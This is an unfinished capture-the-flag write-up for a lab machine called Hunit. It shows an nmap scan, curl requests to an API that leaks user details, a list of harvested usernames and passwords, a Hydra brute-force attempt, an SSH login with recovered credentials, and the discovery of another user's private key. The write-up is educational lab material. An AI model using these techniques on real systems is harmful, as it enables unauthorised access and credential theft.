# Hunit (WIP) ## Nmap ``` sudo nmap 192.168.79.125 -p- -sS -sV Not shown: 65531 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http-proxy 12445/tcp open unknown 18030/tcp open http Apache httpd 2.4.46 ((Unix)) 43022/tcp open ssh OpenSSH 8.4 (protocol 2.0) ``` Browsing to port 8080 takes us to a web page for haikus. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4d7ef279f2cc9d71a9475b3a09c4a55fa0587f4d%2Fimage.png?alt=media) We can individually browse to each haiku. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-30b2cdc0c2f2c9000432d333faeadb7d4cddd512%2Fimage.png?alt=media) Checking the source page for any haiku reveals a comment refer to API. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5816c822b407dc2f74c791c2f52078026f6d534a%2Fimage.png?alt=media) Running curl against the API reveals further information ``` curl http://192.168.79.125:8080/api/ ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4664274a180d9824495e46a69265d30c5b000bec%2Fimage.png?alt=media) Runnining curl against the user API directory reveals sensitive information regarding each user. ``` curl http://192.168.79.125:8080/api/user/ ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bb704a1bff77d1d93df26dea8e83a4c2f2485826%2Fimage.png?alt=media) Compiling the passwords and login names of each provides us with a users and password list. {% tabs %} {% tab title="Users" %} ``` rjackson dademola jvargas jsanchez ``` {% endtab %} {% endtabs %} {% tabs %} {% tab title="Passwords" %} ``` yYJcgYqszv4aGQ ExplainSlowQuest110 KTuGcSW6Zxwd0Q d52cQ1BzyNQycg OuQ96hcgiM5o9w ``` {% endtab %} {% endtabs %} I then tried bruteforcing this with Hydra and was unable to get a result. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-06348ae53bc3a3c9f30f2efeffd276f2cf0d5bfd%2Fimage.png?alt=media) Inspecting our found information further we find that all the users are 'Editors' and David is a admin. The password associated with David is also greatly different from the rest. I then tried a manual login with SSH. ``` ssh -p 43022 dademola@192.168.79.125 ``` Valid credentials: `dademola:ExplainSlowQuest110` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-19d194937ff7bb2d8ee286903d23df4413d944a4%2Fimage.png?alt=media) Looking for other users in /home/ we see we have the Git user. Checking contents of the directory we also have a id\_rsa key. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6566c4d5f7e4b3b0b62eab3e6a24c69f61f0af6a%2Fimage.png?alt=media)